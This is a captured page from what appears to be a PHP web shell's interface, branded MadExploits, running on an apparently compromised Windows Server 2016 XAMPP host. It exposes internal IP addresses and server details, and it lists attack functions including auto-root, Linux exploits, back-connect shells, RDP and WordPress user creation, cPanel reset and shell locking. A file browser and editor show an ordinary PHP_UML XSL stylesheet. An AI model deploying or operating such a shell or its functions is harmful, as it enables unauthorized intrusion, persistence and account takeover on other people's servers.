Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
PHP /
UML /
Output /
Html /
[ HOME SHELL ]
Name
Size
Permission
Action
resources
[ DIR ]
drwxrwxrwx
Exporter.php
864
B
-rw-rw-rw-
allclasses-frame.xsl
1.58
KB
-rw-rw-rw-
classifier.xsl
16.89
KB
-rw-rw-rw-
documentation-common.xsl
8.15
KB
-rw-rw-rw-
documentation-generator.xsl
8.28
KB
-rw-rw-rw-
index-all.xsl
5.79
KB
-rw-rw-rw-
index.xsl
1.71
KB
-rw-rw-rw-
main.xsl
689
B
-rw-rw-rw-
overview-frame.xsl
1.38
KB
-rw-rw-rw-
overview-summary.xsl
4.94
KB
-rw-rw-rw-
package-frame.xsl
2.73
KB
-rw-rw-rw-
package-summary.xsl
5.73
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : documentation-generator.xsl
<?xml version="1.0" encoding="iso-8859-1"?> <xsl:stylesheet version="1.0" exclude-result-prefixes="uml xmi php exslt exslt-set exslt-functions" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:uml="http://schema.omg.org/spec/UML/2.1.2" xmlns:xmi="http://schema.omg.org/spec/XMI/2.1" xmlns:php="http://php.net/xsl" xmlns:exslt="http://exslt.org/common" xmlns:exslt-set="http://exslt.org/sets" xmlns:exslt-functions="http://exslt.org/functions"> <xsl:variable name="packageDelimiter">\</xsl:variable> <xsl:variable name="fileprefixDatatype">datatype-</xsl:variable> <xsl:variable name="fileprefixClass">class-</xsl:variable> <xsl:variable name="fileprefixInterface">interface-</xsl:variable> <xsl:variable name="fileAllclassesFrame">allclasses-frame.html</xsl:variable> <xsl:variable name="fileOverviewFrame">overview-frame.html</xsl:variable> <xsl:variable name="fileOverviewSummary">overview-summary.html</xsl:variable> <xsl:variable name="filePackageFrame">package-frame.html</xsl:variable> <xsl:variable name="filePackageSummary">package-summary.html</xsl:variable> <xsl:variable name="fileIndex">index.html</xsl:variable> <xsl:variable name="fileIndexAll">index-all.html</xsl:variable> <xsl:variable name="cr" select="'
'"/> <xsl:include href="../common.xsl"/> <xsl:template name="top-container"> <xsl:call-template name="inner-container"> <xsl:with-param name="relPathTop" /> </xsl:call-template> <xsl:variable name="containerSet" select="//packagedElement[@xmi:type='uml:Package' or @xmi:type='uml:Model']"/> <!-- Generation of the overview-summary file --> <xsl:variable name="contentOverviewSummary"> <xsl:call-template name="overview-summary"> <xsl:with-param name="containerSet" select="$containerSet" /> </xsl:call-template> </xsl:variable> <xsl:copy-of select="php:function($phpSaveToFile, $fileOverviewSummary, exslt:node-set($contentOverviewSummary)/*)" /> <!-- Generation of the overview-frame file --> <xsl:variable name="contentOverviewFrame"> <xsl:call-template name="overview-frame"> <xsl:with-param name="containerSet" select="$containerSet" /> </xsl:call-template> </xsl:variable> <xsl:copy-of select="php:function($phpSaveToFile, $fileOverviewFrame, exslt:node-set($contentOverviewFrame)/*)" /> <!-- Generation of the allclasses file --> <xsl:variable name="contentAllclasses"> <xsl:call-template name="allclasses" /> </xsl:variable> <xsl:copy-of select="php:function($phpSaveToFile, $fileAllclassesFrame, exslt:node-set($contentAllclasses)/*)" /> <!-- Generation of the index file --> <xsl:variable name="contentIndex"> <xsl:call-template name="index" /> </xsl:variable> <xsl:copy-of select="php:function($phpSaveToFile, $fileIndex, exslt:node-set($contentIndex)/*)" /> <!-- Generation of the index-all file --> <xsl:variable name="contentIndexAll"> <xsl:call-template name="index-all" /> </xsl:variable> <xsl:copy-of select="php:function($phpSaveToFile, $fileIndexAll, exslt:node-set($contentIndexAll)/*)" /> </xsl:template> <!-- Tree walking of containers (uml package/model) --> <xsl:template name="inner-container"> <xsl:param name="relPathTop" /> <!-- relative path to root --> <!-- Misc initializations --> <xsl:variable name="interfaceSet" select="packagedElement[@xmi:type='uml:Interface']" /> <xsl:variable name="classSet" select="packagedElement[@xmi:type='uml:Class']"/> <xsl:variable name="ownedOperationSet" select="ownedOperation"/> <xsl:variable name="ownedAttributeSet" select="ownedAttribute"/> <xsl:variable name="packageNamePart"> <xsl:call-template name="getPackageNamePart"/> </xsl:variable> <!-- Generation of the package-summary file --> <xsl:variable name="contentSummary"> <xsl:call-template name="package-summary"> <xsl:with-param name="relPathTop" select="$relPathTop"/> <xsl:with-param name="interfaceSet" select="$interfaceSet"/> <xsl:with-param name="classSet" select="$classSet"/> <xsl:with-param name="ownedAttributeSet" select="$ownedAttributeSet"/> <xsl:with-param name="ownedOperationSet" select="$ownedOperationSet"/> <xsl:with-param name="packageNamePart" select="$packageNamePart"/> </xsl:call-template> </xsl:variable> <xsl:copy-of select="php:function($phpSaveToFile, $filePackageSummary, exslt:node-set($contentSummary)/*)" /> <!-- Generation of the package-frame files --> <xsl:variable name="contentFrame"> <xsl:call-template name="package-frame"> <xsl:with-param name="relPathTop" select="$relPathTop"/> <xsl:with-param name="interfaceSet" select="$interfaceSet"/> <xsl:with-param name="classSet" select="$classSet"/> <xsl:with-param name="ownedOperationSet" select="$ownedOperationSet"/> <xsl:with-param name="ownedAttributeSet" select="$ownedAttributeSet"/> <xsl:with-param name="packageNamePart" select="$packageNamePart"/> </xsl:call-template> </xsl:variable> <xsl:copy-of select="php:function($phpSaveToFile, $filePackageFrame, exslt:node-set($contentFrame)/*)" /> <!-- Generation of the classifier files --> <xsl:call-template name="generateClassifierFiles"> <xsl:with-param name="relPathTop" select="$relPathTop" /> <xsl:with-param name="setEntities" select="(packagedElement|nestedClassifier)[@xmi:type='uml:Interface' or @xmi:type='uml:Class' or @xmi:type='uml:DataType']"/> </xsl:call-template> <!-- Recursion into the owned containers --> <xsl:for-each select="packagedElement[@xmi:type='uml:Package' or @xmi:type='uml:Model']"> <!-- Creation of folders --> <xsl:copy-of select="php:function($phpCreateFolder, string(@name))" /> <xsl:call-template name="inner-container"> <xsl:with-param name="relPathTop" select="concat($relPathTop, '../')"/> </xsl:call-template> <xsl:copy-of select="php:functionString('chdir', '../')" /> </xsl:for-each> </xsl:template> <!-- Classifier entities handler --> <xsl:template name="generateClassifierFiles"> <xsl:param name="relPathTop"/> <xsl:param name="setEntities"/> <xsl:for-each select="$setEntities"> <xsl:variable name="entity" select="substring-after(@xmi:type,':')"/> <xsl:variable name="xmiType" select="@xmi:type"/> <xsl:variable name="filePrefix"> <xsl:call-template name="getPrefix"/> </xsl:variable> <xsl:variable name="content"> <xsl:call-template name="classifier"> <xsl:with-param name="relPathTop" select="$relPathTop" /> <xsl:with-param name="entity" select="$entity"/> <xsl:with-param name="nestingPackageName"> <xsl:call-template name="getNestingPackageName"> <xsl:with-param name="context" select="."/> </xsl:call-template> </xsl:with-param> <xsl:with-param name="ownedAttributeSet" select="ownedAttribute"/> <xsl:with-param name="ownedOperationSet" select="ownedOperation"/> <xsl:with-param name="generalization" select="key('getElementById',generalization/@general)"/> <xsl:with-param name="implements" select="key('getElementById', key('getRealizations', current()/@xmi:id)/@supplier)"/> <xsl:with-param name="prevEntity" select="preceding-sibling::packagedElement[@xmi:type=$xmiType][1]/@name"/> <xsl:with-param name="nextEntity" select="following-sibling::packagedElement[@xmi:type=$xmiType][1]/@name"/> <xsl:with-param name="filePrefix" select="$filePrefix"/> <xsl:with-param name="relPathClass"> <xsl:call-template name="getPackageFilePath"> <xsl:with-param name="context" select="."/> </xsl:call-template> </xsl:with-param> </xsl:call-template> </xsl:variable> <xsl:copy-of select="php:function($phpSaveToFile, string(concat($filePrefix, @name, '.html')), exslt:node-set($content)/*)" /> <!-- nested entities ? --> <xsl:variable name="setNestedEntities" select="(packagedElement|nestedClassifier)[@xmi:type='uml:Interface' or @xmi:type='uml:Class' or @xmi:type='uml:DataType']"/> <xsl:if test="count($setNestedEntities) > 0"> <xsl:copy-of select="php:function($phpCreateFolder, string(@name))" /> <xsl:call-template name="generateClassifierFiles"> <xsl:with-param name="relPathTop" select="concat('../', $relPathTop)"/> <xsl:with-param name="setEntities" select="$setNestedEntities"/> </xsl:call-template> <xsl:copy-of select="php:functionString('chdir', '../')" /> </xsl:if> </xsl:for-each> </xsl:template> <xsl:template match="xmi:Documentation"/> </xsl:stylesheet>
Close